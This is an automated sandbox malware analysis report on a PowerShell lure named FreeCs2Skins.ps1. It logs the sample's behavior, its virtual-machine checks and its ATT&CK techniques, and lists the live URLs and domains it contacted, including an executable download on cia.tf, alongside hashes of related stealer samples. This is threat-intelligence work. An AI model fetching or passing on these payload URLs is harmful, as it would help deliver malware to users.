Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3905			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5946			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3416	Thread sleep time: -18446744073709540s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2876	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000000.00000002.2254642292.000001AD434F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.0.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FreeCs2Skins.ps1	0%	ReversingLabs

Source	Detection	Scanner	Label
https://cia.tf	0%	Avira URL Cloud	safe
https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exeP	0%	Avira URL Cloud	safe
http://cia.tf	0%	Avira URL Cloud	safe
https://cia.tf/	0%	Avira URL Cloud	safe
https://bad.is-having.fun	0%	Avira URL Cloud	safe
https://coquettte.com	0%	Avira URL Cloud	safe
https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cia.tf	172.67.129.178	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exe	false	Avira URL Cloud: safe	unknown
https://cia.tf/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2250481889.000001AD3B251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cia.tf	powershell.exe, 00000000.00000002.2236342823.000001AD2C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000000.00000002.2236342823.000001AD2BCD3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2250481889.000001AD3B251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://coquettte.com	powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://bad.is-having.fun	powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cia.tf	file.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.0.dr	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2236342823.000001AD2B0A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exeP	powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2236342823.000001AD2B0A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.129.178	cia.tf	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562380
Start date and time:	2024-11-25 14:58:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FreeCs2Skins.ps1
Detection:	MAL
Classification:	mal48.winPS1@3/7@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 3 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3300 because it is empty
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: FreeCs2Skins.ps1

Simulations

Behavior and APIs

Time	Type	Description
08:59:04	API Interceptor	45x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.129.178	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cia.tf	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse	172.67.129.178

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse	104.26.13.205
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	PO#86637.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	0Xp3q1l7De.exe	Get hash	malicious	Remcos	Browse	172.64.41.3
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.24.198
	CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	packing list G25469.exe	Get hash	malicious	FormBook	Browse	104.21.49.253

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse	172.67.129.178
	PO#86637.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.129.178
	CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.129.178
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	172.67.129.178
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.129.178
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.129.178
	WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.129.178
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.129.178
	https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4	Get hash	malicious	HTMLPhisher	Browse	172.67.129.178
	denizbank 25.11.2024 E80 aspc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.129.178

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:NlllulLhwlz:NllUO
MD5:	F442CD24937ABD508058EA44FD91378E
SHA1:	FDE63CECA441AA1C5C9C401498F9032A23B38085
SHA-256:	E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
SHA-512:	927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tledjns.kss.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxz4i341.os2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\file.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	HTML document, Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	2062
Entropy (8bit):	4.8517315141878345
Encrypted:	false
SSDEEP:	48:WywDGnbZIwDG03wDMfmNSNRhV1CSIqanVuT:WDem81C0eI
MD5:	A3705823E9CD79D4B3365416E48024A7
SHA1:	9C659FA6C6A7B82B71D9096989B48C77F9E446FC
SHA-256:	E7C4308F43373C5F00CA53151C4452C662057F20218109FC95B816B9CB202D1F
SHA-512:	499B6FC581546E7E29DC589E9ACE1B79CB308B4774CA912A23D9A544FB3C5EACFCF18AF1042F24DD9F0B531B7C85D05DA858C3E12FBABB0EF3E3CB9329238280
Malicious:	false
